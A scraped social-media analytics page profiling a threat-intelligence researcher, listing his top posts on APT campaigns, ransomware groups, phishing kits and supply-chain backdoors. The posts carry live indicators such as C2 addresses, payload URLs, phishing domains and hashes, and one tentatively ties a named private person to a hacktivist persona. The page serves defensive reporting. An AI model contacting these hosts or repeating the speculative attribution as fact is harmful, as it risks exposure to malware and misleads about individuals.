#  @WhichbufferArda Arda Büyükkaya Arda Büyükkaya posts on X about actor, in the, microsoft, apt the most. They currently have [-----] followers and [---] posts still getting attention that total [--] engagements in the last [--] hours. ### Engagements: undefined [#](/creator/twitter::1513961044590403584/interactions)  - [--] Week [--] -82% - [--] Month [-----] -79% - [--] Months [-------] -48% - [--] Year [-------] -32% ### Mentions: undefined [#](/creator/twitter::1513961044590403584/posts_active)  - [--] Months [--] -17% - [--] Year [--] -14% ### Followers: [-----] [#](/creator/twitter::1513961044590403584/followers)  - [--] Week [-----] +0.10% - [--] Month [-----] +0.25% - [--] Months [-----] +9% - [--] Year [-----] +38% ### CreatorRank: undefined [#](/creator/twitter::1513961044590403584/influencer_rank)  ### Social Influence **Social category influence** [technology brands](/list/technology-brands) [stocks](/list/stocks) [countries](/list/countries) [finance](/list/finance) [social networks](/list/social-networks) [cryptocurrencies](/list/cryptocurrencies) [currencies](/list/currencies) [ncaa football](/list/ncaa-football) [travel destinations](/list/travel-destinations) **Social topic influence** [actor](/topic/actor), [in the](/topic/in-the), [microsoft](/topic/microsoft), [apt](/topic/apt), [key](/topic/key), [file](/topic/file), [mobile](/topic/mobile), [data](/topic/data), [network](/topic/network), [windows](/topic/windows) **Top assets mentioned** [Microsoft Corp. (MSFT)](/topic/microsoft) [Crowdstrike Holdings Inc (CRWD)](/topic/crowdstrike) [Cloudflare, Inc. (NET)](/topic/cloudflare) [Alphabet Inc Class A (GOOGL)](/topic/$googl) [CyberConnect (CYBER)](/topic/cyber) [OORT (OORT)](/topic/oort) [Raytheon Technologies Corp (RTX)](/topic/$rtx) ### Top Social Posts Top posts by engagements in the last [--] hours "@malwrhunterteam @ShadowChasing1 @h2jazi @cyb3rops Here is the decrypted C2 URL: hxxps://cryptyk.ddns.net It's being stored inside the PDF file and Encrypted with [---] byte long XOR key decryption done by encrypt_pdf function upon execution of malware" [X Link](https://x.com/WhichbufferArda/status/1656980803450986496) 2023-05-12T11:13Z [----] followers, [---] engagements "Malware Deobfuscation with @OpenAI Remcos malware delivery via ISO Obfuscated VBS Powershell Download Second Stage Inject into ielowutil.exe Injected Remcos: https://tria.ge/230812-t6nmbscf33/static1 https://tria.ge/230812-t6nmbscf33/static1" [X Link](https://x.com/anyuser/status/1690404358481997824) 2023-08-12T16:46Z [----] followers, 15K engagements "@ImposeCost Its Turkish barber shops doing ASMR videos :p you can search them in your area but I dont think you can find it in Virginia" [X Link](https://x.com/anyuser/status/1700918486623567948) 2023-09-10T17:05Z [--] followers, [--] engagements "Backdoor found in XZ Utils versions 5.6.0 and 5.6.1 that is leading to ssh server compromise. This activity was assignedCVE-2024-3094. XZ Utils is data compression software 👀" [X Link](https://x.com/WhichbufferArda/status/1773813395474534906) 2024-03-29T20:44Z [----] followers, [----] engagements "Testing the XZ Utils backdoor kill switch (yolAbejyiejuvnup=Evjtgvsh5okmkAvj) this string stop the backdoor so it won't hooking into RSA_public_decrypt() function" [X Link](https://x.com/anyuser/status/1774729956834123876) 2024-04-01T09:26Z [----] followers, 62K engagements "Subdomain enumeration with open source tool called SubEnum F5 BIG-IP (CVE-2023-46747) exploit ARP scan on internal network after the exploit Port / Service enumeration Lateral movement toMSSQL Database Server Credential dump from MSSQL server RDP into MSSQL server data exfiltration. Linked to the Cyber Court and Makhlab al-Nasr Pro-Palestinian hacking group. cc @BushidoToken #BREAKING A hacker group named Makhlab_al_Nasr has hacked the data of [--] million Israelis including: 1-their personal information 2-bank account details 3-residential addresses and more which are now at the disposal of the" [X Link](https://x.com/anyuser/status/1775817205403230643) 2024-04-04T09:26Z [----] followers, 53.4K engagements "@utkusen https://www.virustotal.com/gui/file/3fe7211742fc790d5b26b04bc4a1f707abd1fd6ae27b79947a842c9863a94711/details https://www.virustotal.com/gui/file/3fe7211742fc790d5b26b04bc4a1f707abd1fd6ae27b79947a842c9863a94711/details" [X Link](https://x.com/WhichbufferArda/status/1779227773447368942) 2024-04-13T19:18Z [----] followers, [----] engagements "@utkusen Bunu sadece isim benzerliinden buldum o yzden gerekten bu zararl m kullanld yoksa baka bir zararl m tam bilmiyorum. CrowdStrike ok byk ihtimalle yakalar" [X Link](https://x.com/WhichbufferArda/status/1779248648607383778) 2024-04-13T20:41Z [----] followers, [--] engagements "Cyber Army of Russia Reborn (CARR) is an Hacktivist Telegram persona associated with #APT44 by @Mandiant. CARR prepared an training for DDOS attacks against Ukrainian targets you can see the username of the device is "SergoZar" which is likely associated with Github user "SergoZar". Persona "SergoZar" is using a public portfolio page and following himself which is Mr. Alexander Ryabov aka "ZKelo" or "SergoZar". It's just an assumption I'm not linking to Cyber Army of Russia Reborn (CARR) to this gentlemen but for me this profile is matching an interesting link. What you thing @BushidoToken" [X Link](https://x.com/anyuser/status/1781435565923061904) 2024-04-19T21:31Z [----] followers, 18.5K engagements "🤣cc @herrcore https://github.com/NationalSecurityAgency/ghidra/assets/42712921/ba4acc7f-f7d5-4cdf-be86-44eb503fe0cc https://github.com/NationalSecurityAgency/ghidra/assets/42712921/ba4acc7f-f7d5-4cdf-be86-44eb503fe0cc" [X Link](https://x.com/WhichbufferArda/status/1781989720601289155) 2024-04-21T10:13Z [----] followers, [----] engagements "@ThisMyHandle @herrcore Its TLP:RED nah just open an issue and upload your stuff in thay comment then copy the link here you go magic" [X Link](https://x.com/WhichbufferArda/status/1782023755532759485) 2024-04-21T12:29Z [----] followers, [---] engagements "According to Microsoft the Chinese APT group Volt Typhoon camouflages its command-and-control (C2) network activities by compromising small office and home office (SOHO) network equipment. The previous report highlights that Volt Typhoon employs a modified version of the Fast Reverse Proxy (FRP) to maintain persistent access to victim networks. When I analyzed the UPX-packed FRP sample referenced in the report I discovered the string 'MAGA2024' alongside a hardcoded 64.183.202.102 C2 IP address. This IP is linked to an SSL certificate for a 'Vigor Router' and with a location metadata as" [X Link](https://x.com/anyuser/status/1789381168892149910) 2024-05-11T19:44Z [----] followers, 75.6K engagements "Microsoft Report: UPX Packed FRP: 472ccfb865c81704562ea95870f60c08ef00bcd2ca1d7f09352398c05be5d05d Unpacked FRP: a0e581c0698a64bcb97f239172b31ed9009de1a89ba0d0e1e2fce2dfc6a496c0 C2 IP: 64.183.202.102 cc @BushidoToken https://www.microsoft.com/en-us/security/blog/2023/05/24/volt-typhoon-targets-us-critical-infrastructure-with-living-off-the-land-techniques/ https://www.microsoft.com/en-us/security/blog/2023/05/24/volt-typhoon-targets-us-critical-infrastructure-with-living-off-the-land-techniques/" [X Link](https://x.com/WhichbufferArda/status/1789381171236802561) 2024-05-11T19:44Z [----] followers, [----] engagements "@BushidoToken With low confidence since compromised C2 IP is DrayTek Vigor2960 Series router threat actor probably used CVE-2020-19664 RCE. https://github.com/peanuts62/bug_poc https://github.com/peanuts62/bug_poc" [X Link](https://x.com/WhichbufferArda/status/1789405270638002549) 2024-05-11T21:20Z [----] followers, [----] engagements "I woke up and looked at my livehunt alerts in VT. I saw the confidential emails accidentally uploaded by one of the Five Eye countries. I shut down my laptop and took a walk" [X Link](https://x.com/WhichbufferArda/status/1796281877248221208) 2024-05-30T20:45Z [----] followers, [---] engagements "The rise of the far-right movements in Europe. Interesting political trend to watch for it. The state of France this evening This shows the party that came top in voting for the European Parliament on June [--] in every commune in France. Brown represents the far right https://t.co/PP0C5KjrIW The state of France this evening This shows the party that came top in voting for the European Parliament on June [--] in every commune in France. Brown represents the far right https://t.co/PP0C5KjrIW" [X Link](https://x.com/WhichbufferArda/status/1799916014131437643) 2024-06-09T21:26Z [----] followers, [---] engagements "@RussianPanda9xx Thats why I love CTI community 😎" [X Link](https://x.com/WhichbufferArda/status/1803287938773504075) 2024-06-19T04:45Z [----] followers, [---] engagements "@jamieantisocial @Gi7w0rm @DrunkBinary @AShukuhi Thank you 😊" [X Link](https://x.com/WhichbufferArda/status/1803679514456719494) 2024-06-20T06:41Z [----] followers, [---] engagements "🌟 Exciting Announcement I am happy to share that I will be attending and presenting at the ENISA Cyber Threat Intelligence (CTI) for Europe conference on October 1st The event will be held at the Hotel Thon Bristol Stephanie in Brussels Belgium. I will present my latest research on the "Rebranding of the Caffeine Phishing Kit Targeting Financial Institutions." This topic is part of the session on using open-source intelligence (OSINT) and technical intelligence (TECHINT) for analysis scheduled from 11:30 to 12:30. Join me and other industry experts as we delve into the latest developments in" [X Link](https://x.com/WhichbufferArda/status/1812049472605561037) 2024-07-13T09:00Z [----] followers, [---] engagements "I created a simple Group Policy (GPO) to automatically fix CrowdStrike BSOD (Blue screen of death) issue. https://gist.github.com/whichbuffer/7830c73711589dcf9e7a5217797ca617 BREAKING: The US Aviation Authority has required all flights to land due to a technical computer glitch. https://t.co/dPVzkhHZAS https://gist.github.com/whichbuffer/7830c73711589dcf9e7a5217797ca617 BREAKING: The US Aviation Authority has required all flights to land due to a technical computer glitch. https://t.co/dPVzkhHZAS" [X Link](https://x.com/anyuser/status/1814213796946137349) 2024-07-19T08:20Z [----] followers, 120.4K engagements "Fake CVE exploit POCs especially for high-profile vulnerabilities like CVE-2024-38063 are unfortunately a common tactic used by malicious actors to distribute malware over Github. https://www.virustotal.com/gui/file/0dfa551e2b12af0991714a3e5be26c9a4c00f7663f065dbf4d8b84c9abc7b97a/detection https://www.virustotal.com/gui/file/0dfa551e2b12af0991714a3e5be26c9a4c00f7663f065dbf4d8b84c9abc7b97a/detection" [X Link](https://x.com/anyuser/status/1824924289398689999) 2024-08-17T21:40Z [----] followers, 18.6K engagements "🚨 Beware Threat actors are using PDFs to lure victims into installing the FleetDeck RMM tool. These malicious PDFs embed a URL (agent.fleetdeck.io) behind a button tricking users to click and download the FleetDeck executable. Once installed this remote management tool could give attackers control over your device. #CyberSecurity #PhishingAlert" [X Link](https://x.com/WhichbufferArda/status/1826735715893248086) 2024-08-22T21:38Z [----] followers, [--] engagements "Here is a one that target users in Netherlands with Dutch langue. They are using Real Estate lure this time. Same author was observed over and over "Dennis Block"" [X Link](https://x.com/WhichbufferArda/status/1826737329869844665) 2024-08-22T21:44Z [----] followers, [---] engagements "🕸💻 Check out my latest analysis on how SCATTERED SPIDER targets cloud infrastructures in the financial and insurance sectors. cc @BushidoToken @Gi7w0rm @TomHegel @AShukuhi @UK_Daniel_Card #CyberSecurity #ThreatIntelligence #Ransomware #CloudSecurity https://blog.eclecticiq.com/ransomware-in-the-cloud-scattered-spider-targeting-insurance-and-financial-industries https://blog.eclecticiq.com/ransomware-in-the-cloud-scattered-spider-targeting-insurance-and-financial-industries" [X Link](https://x.com/anyuser/status/1833530199805464806) 2024-09-10T15:37Z [----] followers, 37.6K engagements "Ive outlined the full Ransomware Deployment Life Cycle for cloud environments detailing key stages of attack persistence and execution.Also dont miss the deep dive on Telecom Enemies a Developer-as-a-Service (DaaS) group empowering phishing and cyberattacksusing tools like the Gorilla Call Bot for vishing attacks. Their influence is growing within underground forums. 🕸💻 Check out my latest analysis on how SCATTERED SPIDER targets cloud infrastructures in the financial and insurance sectors. https://t.co/awFf6sUDYB cc @BushidoToken @Gi7w0rm @TomHegel @AShukuhi @UK_Daniel_Card #CyberSecurity" [X Link](https://x.com/anyuser/status/1833530882264862940) 2024-09-10T15:40Z [----] followers, 14.1K engagements "It seems like someone popped OpenAIs X account to spread some crypto scam. Remember kids there is no free or easy money. Stay safe ☢" [X Link](https://x.com/WhichbufferArda/status/1838346480534356238) 2024-09-23T22:35Z [----] followers, [----] engagements "Today I had the privilege of presenting at the ENISA CTI Conference in Brussels . It was a fantastic experience with insightful speakers and excellent networking opportunities" [X Link](https://x.com/WhichbufferArda/status/1841162931402072437) 2024-10-01T17:07Z [----] followers, [---] engagements "The costs of fragmentation:as trade falls and barriers rise global growth likely take a severe hit in coming years. According to the latest International Monetary Fund projectionsannual global GDP growth in [----] will be only three percentthe IMFs lowest five-year-ahead forecast in the past three decadeswhich spells trouble for poverty reduction and for creating jobs among burgeoning populations of young people in developing countries. Fragmentation risks making this already weak economic picture even worse. As growth falls opportunities vanish and tension builds the worldalready divided by" [X Link](https://x.com/WhichbufferArda/status/1850562911695196183) 2024-10-27T15:39Z [----] followers, [---] engagements "🚨🕷 Proud to share my latest research on the LUNAR SPIDER campaign. Our findings reveal how RaaS operators leveraged LUNAR SPIDERs malware including IcedID and the Latrodectus loader along with Brute Ratel C4 infrastructure to enable their attacks on the financial sector. cc @BushidoToken @HackingLZ @cyb3rops @MichalKoczwara @RussianPanda9xx @ddd1ms @jstrosch https://blog.eclecticiq.com/inside-intelligence-center-lunar-spider-enabling-ransomware-attacks-on-financial-sector-with-brute-ratel-c4-and-latrodectus" [X Link](https://x.com/anyuser/status/1851612883609670039) 2024-10-30T13:11Z [----] followers, 31.8K engagements "🚨 New threat research: SilkSpecter a likely China-based threat actor is targeting EU & US e-commerce shoppers for financial fraud by using fake Black Friday sites to steal victims' debit and credit card details. https://blog.eclecticiq.com/inside-intelligence-center-financially-motivated-chinese-threat-actor-silkspecter-targeting-black-friday-shoppers https://blog.eclecticiq.com/inside-intelligence-center-financially-motivated-chinese-threat-actor-silkspecter-targeting-black-friday-shoppers" [X Link](https://x.com/anyuser/status/1857073740384788977) 2024-11-14T14:50Z [----] followers, 10.8K engagements "The FBI linked "BUCHANAN" to Scattered Spider through phishing domains like fake Okta sites registered on NameCheap using the email lululongstaffihw98@gmail.com under the username "bobsagetfaget." These domains were traced to his residence confirming his role in the groups credential theft campaigns. cc @BushidoToken https://www.documentcloud.org/documents/25355101-usa-v-buchanan-complaint-redacted https://www.documentcloud.org/documents/25355101-usa-v-buchanan-complaint-redacted" [X Link](https://x.com/anyuser/status/1859320516471030256) 2024-11-20T19:38Z [----] followers, 37.3K engagements "Phishing domain tmobiie.us was created by Tyler Robert Buchanan aka "bobsagetfaget" or "BUCHANAN". You can see the reverse whois lookup result. The FBI linked "BUCHANAN" to Scattered Spider through phishing domains like fake Okta sites registered on NameCheap using the email lululongstaffihw98@gmail.com under the username "bobsagetfaget." These domains were traced to his residence confirming his role in the groups https://t.co/HUQgImtn5P The FBI linked "BUCHANAN" to Scattered Spider through phishing domains like fake Okta sites registered on NameCheap using the email" [X Link](https://x.com/anyuser/status/1859323657517953160) 2024-11-20T19:51Z [----] followers, 18.5K engagements "Very Similar domains over here: tmobiie.com staging.tmobiie.com mintmobiie.com tmobiie.net americafirstmobiie.com okta-tmobiie.net okta.tmobiie.net" [X Link](https://x.com/WhichbufferArda/status/1859324979994570828) 2024-11-20T19:56Z [----] followers, [---] engagements "After using some cool network pivoting tricks and a zero-day privilege escalation the threat actor leveraged noisy reg.exe to dump SAM credentials and PowerShell to compress the results. https://www.volexity.com/blog/2024/11/22/the-nearest-neighbor-attack-how-a-russian-apt-weaponized-nearby-wi-fi-networks-for-covert-access/ https://www.volexity.com/blog/2024/11/22/the-nearest-neighbor-attack-how-a-russian-apt-weaponized-nearby-wi-fi-networks-for-covert-access/" [X Link](https://x.com/WhichbufferArda/status/1860025852744073501) 2024-11-22T18:21Z [----] followers, [----] engagements "🕷🕸SCATTERED SPIDER phishing activities: Registrar: - Hosting Concepts B.V. d/b/a Registrar EU iuiuiemon.com - 2024-11-13 vision-victra.com - 2024-11-09 cc @BushidoToken @malwrhunterteam @TLP_R3D @AlvieriD @ImposeCost" [X Link](https://x.com/anyuser/status/1861060536776999256) 2024-11-25T14:53Z [----] followers, [----] engagements "Threat actors exploits GlobalProtect (CVE-2024-3400) to deliver the Sliver C2 malware (up.js) by leveraging the compromised VICIdial server threat actor likely exploited the (CVE-2024-8504) to store their payloads on legitimate server (104.131.69.106/vicidial/up.js)" [X Link](https://x.com/anyuser/status/1864735776413540600) 2024-12-05T18:17Z [----] followers, 14.7K engagements "Supply chain attempt on ultralytics PyPI package.Attacker opened a pull request and pushed a commit with a malicious name leading to CI code injection. They then backdoored versions 8.3.41 and 8.3.42 with code downloading a second-stage binary from GitHub. https://github.com/ultralytics/ultralytics/pull/18020 https://github.com/ultralytics/ultralytics/pull/18020" [X Link](https://x.com/WhichbufferArda/status/1864755296058642541) 2024-12-05T19:34Z [----] followers, [----] engagements "🕵Gamaredon #APT activity targeting State Bureau of Investigation in Ukraine (DBR or ): Phishing email - XHTML Smuggling Payload - Download RAR - LNK - MSHTA LOLBIN Download third stage Email: 27515d71b91bbdbb55437de6b729663c0cd206d7112ddbc439d82d8a6e1dde3e HTML Payload: b5d59bb932843ca58c29971e73edfe642731701f29133eb1cfb8841e198d567f Download Second Stage RAR file from: entities-important-surgeon-ever.trycloudflare.com LNK File: 35f714c491897d32c7c68386dac02615071ae4587729dc46d524c6e468ac1cbe" [X Link](https://x.com/anyuser/status/1865043823207796759) 2024-12-06T14:41Z [----] followers, [----] engagements "With the fall of the Assad regime in Syria the status of Russias critical military installationsmost notably the Tartus naval base and the Hmeimim Air Basehas become uncertain. Although current satellite imagery does not indicate an immediate departure a full Russian withdrawal in the near future appears increasingly likely. Such a move would seriously compromise Moscows corridor into Africa curtailing its ability to maintain logistical operations in Libya and to project power across the Mediterranean. Should Russia attempt to evacuate its naval presence Turkish restrictions at the Bosphorus" [X Link](https://x.com/WhichbufferArda/status/1866922078953251226) 2024-12-11T19:04Z [----] followers, [---] engagements "An unknown threat actor is leveraging OORT infrastructures a US-based decentralized cloud solution actively used by Chinese users to deliver Word documents embedded with QR codes. These documents use HR-related lures to target South Korean entities aiming to execute phishing attacks. IOC: employee-benefits-package.archive.us-east-1.oortech.com 321719a387926235b0bca136b971d870e3ac1966a878fb9b2dc4b5bbc84cf517 bee2d564b8b84d4598decc0ed03a384a50cae84a5507ef2302aa1141fb46a378 c074608fdc2aaf7dc01f99002ac7e73ab372e8fe538161ba715446c17fcda2f6" [X Link](https://x.com/WhichbufferArda/status/1867264551596507193) 2024-12-12T17:45Z [----] followers, [---] engagements "Summary of the Treasury Department breach (per public sources): A key unresolved cybersecurity issue lies in securing third-party vendor relationships. cc @BushidoToken @DrunkBinary @cyb3rops @TLP_R3D" [X Link](https://x.com/anyuser/status/1876348324338618733) 2025-01-06T19:21Z [----] followers, [----] engagements "From the BlackBasta chat logs I obtained access to GoblinCrypt a private malware encryption tool used to bypass EDR/AV. With it I pivoted into each malware samples and C2 address. Heres the full https://gist.github.com/whichbuffer/20820e3c0ad52c0a4496fa64dd2a01bf https://gist.github.com/whichbuffer/20820e3c0ad52c0a4496fa64dd2a01bf" [X Link](https://x.com/anyuser/status/1893329469038850070) 2025-02-22T15:58Z [----] followers, 36.3K engagements "Threat actor has been observed targeting Colombian government entities including Consorcio Fopep under the Ministry of Labor via a phishing campaign that uses malicious SVG email attachments. When a victim opens the attached SVG file it downloads a second-stage malware payload packaged inside a password-protected ZIP archive. This payload initiates the delivery of the Remcos Remote Access Trojan (RAT) via DLL sideloading. The threat actor abused ciscosparklauncher.dll to launch the Remcos RAT. Additionally they loaded the vulnerable driver zamguard64.sysassociated with Zemana Anti-Malwareto" [X Link](https://x.com/anyuser/status/1911160065597362365) 2025-04-12T20:50Z [----] followers, 10.1K engagements "Sri Lanka Ministry of Foreign Affairs hit by a phishing attack. The email titled HIGHLY CONFIDENTIAL - Rotation of Sri Lankan Peacekeepers and Human Rights Clearance came from a Microsoft [---] account belonging to Pakistans Naval University "pro-rector.admin@bahria.edu.pk". The phishing email used an embedded image designed to mimic a Gmail message with an attachment. In reality the image linked to a malicious URL: "gs23-production.up.railway.app/fgefwegfwefa33hh23=". This link briefly led to a PDF file before redirecting the user to a fake Gmail login page to steal their credentials. The" [X Link](https://x.com/WhichbufferArda/status/1915113093576720663) 2025-04-23T18:38Z [----] followers, [----] engagements "The SAP NetWeaver exploit (CVE-2025-31324) is seriously bad. Ive seen some of the targets its horrifying. There are critical infrastructure networks affected 😬" [X Link](https://x.com/anyuser/status/1917710109054230876) 2025-04-30T22:38Z [----] followers, [----] engagements "🚨 Luna Moth is back hitting U.S. law & finance firms with callback phishing: Deceive victims to call fake IT helpdesks Abuse GoDaddy infra & Reamaze AI chatbots for social engineering Live operators guide victims to install RMM tools WinSCP & Rclone for data exfiltration Data theft followed by extortion through threats to publish on a data leak site (DLS). https://blog.eclecticiq.com/from-callback-phishing-to-extortion-luna-moth-abuse-reamaze-helpdesk-and-rmm-tools-against-u.s.-legal-and-financial-sectors" [X Link](https://x.com/WhichbufferArda/status/1917894864425120093) 2025-05-01T10:52Z [----] followers, 35K engagements "Multiple Chinese nation-state APT groups have gained initial access to critical infrastructure networks through SAP NetWeaver intrusions aiming to conduct cyber-enabled espionage and maintain persistent remote access. https://blog.eclecticiq.com/china-nexus-nation-state-actors-exploit-sap-netweaver-cve-2025-31324-to-target-critical-infrastructures https://blog.eclecticiq.com/china-nexus-nation-state-actors-exploit-sap-netweaver-cve-2025-31324-to-target-critical-infrastructures" [X Link](https://x.com/anyuser/status/1922261336072892695) 2025-05-13T12:03Z [----] followers, 94.4K engagements "🚨UNC5221 China-Nexus Threat Actor Actively Exploiting Ivanti EPMM (CVE-2025-4428). Victims include: Germany's top telecom provider & defense contractors UK healthcare institutions tied to NHS U.S. pharma aviation and mobile security companies Leading APAC banks and automotive tech firms Multiple EU local governments & research institutes https://blog.eclecticiq.com/china-nexus-threat-actor-actively-exploiting-ivanti-endpoint-manager-mobile-cve-2025-4428-vulnerability" [X Link](https://x.com/anyuser/status/1925210805793955889) 2025-05-21T15:23Z [----] followers, 40.5K engagements "Ivanti EPMM stored MySQL creds in cleartext (/mi/files/system/.mifpp). Threat actors accessed the DB and exfiltrating mobile device metadata (IMEI SIM location) LDAP configs and Office [---] tokens from potentially thousands of victims. Read more here: https://blog.eclecticiq.com/china-nexus-threat-actor-actively-exploiting-ivanti-endpoint-manager-mobile-cve-2025-4428-vulnerability https://blog.eclecticiq.com/china-nexus-threat-actor-actively-exploiting-ivanti-endpoint-manager-mobile-cve-2025-4428-vulnerability" [X Link](https://x.com/anyuser/status/1925451725642539393) 2025-05-22T07:20Z [----] followers, [----] engagements "The Pakistan Airports Authority (PAA) appears to have been compromised their email infrastructure being used to distribute password-protected ZIP archives containing a previously undocumented malware. The payload is disguised with an .MCU file extension masquerading as a legitimate Excel document. The phishing campaign leverages a lure titled Telecom Sector Collaboration for Aviation Modernization clearly tailored to target the telecommunications industry within Pakistan. Interestingly I found an easter egg inside the remote host the threat actor behind the campaign claims affiliation with" [X Link](https://x.com/anyuser/status/1933300356370325981) 2025-06-12T23:08Z [----] followers, 22.4K engagements "EntroLink is a South Korean network security company developed the PPX-AnyLink VPN appliance. As of recent Shodan scans approximately [--] devices remain exposed most of them located in South Korea. In [----] ransomware groups such as LockBit and BlackMatter exploited another RCE vulnerability in PPX-AnyLink enabling root-level access to victim networks. https://therecord.media/ransomware-gangs-are-abusing-a-zero-day-in-entrolink-vpn-appliancesutm_source https://therecord.media/ransomware-gangs-are-abusing-a-zero-day-in-entrolink-vpn-appliancesutm_source" [X Link](https://x.com/WhichbufferArda/status/1933606757907247315) 2025-06-13T19:25Z [----] followers, [---] engagements "Threat actors actively abuse "Robocopy" (a built-in Windows utility) to deliver malware from WebDAV. You can quickly detect this behavior by using SIGMA rule: Malware Sample: https://bazaar.abuse.ch/sample/62fce3f773ec3911fe1a20d3aca1fced6c1a5afa4d8f58711e49232b7dc9c111 https://github.com/SigmaHQ/sigma/blob/master/rules/windows/process_creation/proc_creation_win_susp_copy_system_dir_lolbin.yml https://bazaar.abuse.ch/sample/62fce3f773ec3911fe1a20d3aca1fced6c1a5afa4d8f58711e49232b7dc9c111" [X Link](https://x.com/anyuser/status/1939668867476832300) 2025-06-30T12:54Z [----] followers, [----] engagements "China-nexus APTs arent just targeting governments theyre going after critical industries that power our daily lives. Join us on [--] July to explore why threat intelligence is essential to detect understand and stop these threats before they breach your defences. 🔗 #cyber #APAC #EU #US @EclecticIQ @TeamT5_Official https://lnkd.in/eCZRNhjW https://lnkd.in/eCZRNhjW" [X Link](https://x.com/WhichbufferArda/status/1940430058155393276) 2025-07-02T15:19Z [----] followers, [----] engagements "✈Airline customers targeted with callback phishing threat actor using helpdesk and customer support lures. The phishing domains are often hosted on Cloudflare Pages. Here are some IOCs: official-airlines-support-hub.neocities.org frontier-airlines-support.pages.dev official-airlines-support.pages.dev emirates-airlines-support.pages.dev emirates-airlines-support.pages.dev qantas-airlines-support-pages.dev qantas-airlines-support.pages.dev copa-airlines-support-1ao.pages.dev all-airlines-supportdesk.pages.dev lufthansa-airlines-supports.pages.dev lufthansa-airlines-support.pages.dev" [X Link](https://x.com/WhichbufferArda/status/1940681465265619409) 2025-07-03T07:58Z [----] followers, [---] engagements "🚨Here is my analysis on GLOBAL GROUP RaaS. I identified the IP address behind their Tor-based Dedicated Leak Site (DLS): 193.19.119.4. The server is hosted by IpServer a Russia-based VPS provider also previously used to host the DLS infrastructure for the Mamona RIP ransomware operation. The GLOBAL GROUP RaaS manager (alias $$$) actively seeks remote access to corporate networks via Initial Access Brokers (IABs). Targeting enterprise VPN appliances (Fortinet Palo Alto Cisco) and routinely acquires RDP access to high value targets." [X Link](https://x.com/anyuser/status/1945029879163965470) 2025-07-15T07:57Z [----] followers, 16.6K engagements "Qilin ransomware affiliate hastalamuerte claims he lost $48K after a ransom negotiation mysteriously disappeared from a Tox chat. In the same thread another actor Nova posted credentials and a screenshot of Qilins affiliate panel to embarrass the group. ji57fr53anp7wb44tbbnp72qcgbhqywy4jmbncawdcrejj5amuvh3zqd.onion" [X Link](https://x.com/anyuser/status/1950934137881207205) 2025-07-31T14:58Z [----] followers, [----] engagements "@l0kutus No its Ramp" [X Link](https://x.com/WhichbufferArda/status/1950945570551443726) 2025-07-31T15:44Z [----] followers, [--] engagements "🚨 Nova RaaS admin is actively looking for access to enterprise remote access solutions Fortinet VPN Citrix Cisco VPN & Microsoft RDWeb. Many enterprises still lack the visibility to detect and disrupt these initial breach points a gap ransomware gangs continue to abuse with a high success rate" [X Link](https://x.com/WhichbufferArda/status/1950955120088248819) 2025-07-31T16:22Z [----] followers, [---] engagements "ShinyHunters have released their exploit tool for SAP NetWeaver Visual Composer (CVE-2025-31324). While analysing the Base64-encoded Java payload I spotted an unusual marker string: "Pwner274576528033300"" [X Link](https://x.com/anyuser/status/1956354918026985634) 2025-08-15T13:58Z [----] followers, 11.3K engagements "NPM developer "qix" was compromised with 2FA themed phishing leading to a massive supply chain attack that infected core libraries with over 1B weekly downloads. The injected malware is designed to steal crypto keys swap wallet addresses and hijack transactions. Phishing domain: npmjs.help Passive DNS: 185.7.81.108" [X Link](https://x.com/WhichbufferArda/status/1965130927061008745) 2025-09-08T19:11Z [----] followers, [----] engagements "The macOS information stealer service previously marketed as Mentalpositive appears to have been rebranded under the name MacSync. The developers highlight capabilities such as browser credential theft keychain decryption crypto-wallet theft Telegram session hijacking and recursive file collection" [X Link](https://x.com/WhichbufferArda/status/1966447655971623149) 2025-09-12T10:23Z [----] followers, [---] engagements "A separate module for phishing Ledger seed phrases is available at additional cost. The service is offered on subscription for USD [----] per month with customer support facilitated via a dedicated Telegram channel" [X Link](https://x.com/WhichbufferArda/status/1966447658718855548) 2025-09-12T10:23Z [----] followers, [---] engagements "I extracted the malicious Bash workflow embedded in the Tinycolor supply chain attack. It persists inside victim repositories by executing automatically during CI/CD runs harvesting secrets and environment variables and exfiltrating them to an attacker-controlled webhook. Here is the script I have a feeling that it was generated by AI 😅 https://gist.github.com/whichbuffer/d4922cff694307175310c4f285b09370 https://gist.github.com/whichbuffer/d4922cff694307175310c4f285b09370" [X Link](https://x.com/WhichbufferArda/status/1968027917868282148) 2025-09-16T19:03Z [----] followers, [----] engagements "🐛 New GoAnywhere MFT vulnerability with CVSS score [--] (CVE-2025-10035) there are 90K+ internet facing MFT servers. Similar flaw were exploited by Cl0p RaaS in [----]. We are going to see more Ransomware victims soon patch now (7.8.4 / 7.6.3) https://www.fortra.com/security/advisories/product-security/fi-2025-012 https://www.fortra.com/security/advisories/product-security/fi-2025-012" [X Link](https://x.com/WhichbufferArda/status/1969127061039059109) 2025-09-19T19:50Z [----] followers, [----] engagements "I found documentation for ARINC cMUSE showing that it can be deployed on AWS cloud. I wonder is this a cloud security oopsie. On Saturday a major cyberattack against ARINC cMUSE a check-in and boarding system produced by Collins Aerospace a subsidiary of RTX Corporation (Raytheon) disrupted operations and caused serious delays at several airports across Europe including Londons Heathrow Airport https://t.co/chIfCtyuLm On Saturday a major cyberattack against ARINC cMUSE a check-in and boarding system produced by Collins Aerospace a subsidiary of RTX Corporation (Raytheon) disrupted operations" [X Link](https://x.com/WhichbufferArda/status/1969539530781806884) 2025-09-20T23:09Z [----] followers, [----] engagements "@SimoKohonen Exactly they did succeed to targeting highly sensitive government entities in Middle East by simply exploiting ProxyShell vulnerabilities" [X Link](https://x.com/WhichbufferArda/status/1973490912757178532) 2025-10-01T20:51Z [----] followers, [---] engagements "@RussianPanda9xx Likewise let me know if youre coming to CYBERWARCON or Black Hat EU ;)" [X Link](https://x.com/WhichbufferArda/status/1975085206077104293) 2025-10-06T06:26Z [----] followers, [---] engagements "🚨Here is my latest research at @EclecticIQ: ShinyHunters teamed up with Scattered Spider to conduct vishing attacks targeting cloud application users bribing employees for insider access and targeting CI/CD tools for supply chain attacks. https://blog.eclecticiq.com/shinyhunters-calling-financially-motivated-data-extortion-group-targeting-enterprise-cloud-applications https://blog.eclecticiq.com/shinyhunters-calling-financially-motivated-data-extortion-group-targeting-enterprise-cloud-applications" [X Link](https://x.com/WhichbufferArda/status/1968268768574046288) 2025-09-17T11:00Z [----] followers, 67.7K engagements "Imagine working at an Iranian APT group putting in [---] hours just to exploit some NETGEAR and Cisco modems. The best part They even partnered with the Iranian data center Tebyan and tried to use Starlink" [X Link](https://x.com/WhichbufferArda/status/1973425338526155058) 2025-10-01T16:30Z [----] followers, [----] engagements "Companies like Memento Labs (ex-Hacking Team) sell lawful interception tools for millions of euros to governments yet their code is wrapped in VMProtect the same commercial 